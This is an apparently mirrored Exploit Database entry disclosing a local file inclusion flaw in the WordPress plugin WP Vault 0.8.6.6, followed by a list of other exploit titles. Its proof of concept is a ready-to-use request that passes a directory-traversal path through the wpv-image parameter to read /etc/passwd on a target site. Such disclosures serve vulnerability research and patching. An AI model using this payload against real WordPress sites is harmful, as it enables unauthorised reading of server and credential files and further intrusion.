WordPress Plugin WP Vault 0.8.6.6 – Local File Inclusion

Exploit Database
13 阅读

作者： Lenon Leite

日期： 2016-11-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/40850/

# Exploit Title:WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
# Software Link: https://wordpress.org/plugins/wp-vault/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 0.8.6.6
# Tested on: Ubuntu 14.04

1 - Description:

$_GET[“wpv-image”] is not escaped in include file.

http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/


2 - Proof of Concept:

http://Target/?wpv-image=[LFI]

http://Target/?wpv-image=../../../../../../../../../../etc/passwd

3 - Timeline:

12/11/2016 - Discovered
12/11/2016 - vendor not found

last Exploits
WordPress Plugin WP Vault 0.8.6.6 – Local File Inclusion的更多信息

Church Management System 1.0 – ‘Multiple’ Stored Cross-Site Scripting (XSS)：
Majoda CMS – Authentication Bypass：
Horde Groupware Webmail 3/4/5 – Multiple Remote Code Executions：
PaulPrinting CMS Printing 1.0 – SQL Injection：
Wing FTP Server 6.2.5 – Privilege Escalation：
Vesta Control Panel 0.9.8-26 – Authenticated Remote Code Execution (Metasploit)：
Joomla! Component com_org – ‘letter’ SQL Injection：
Cisco Digital Network Architecture Center 1.3.1.4 – Persistent Cross-Site Scripting：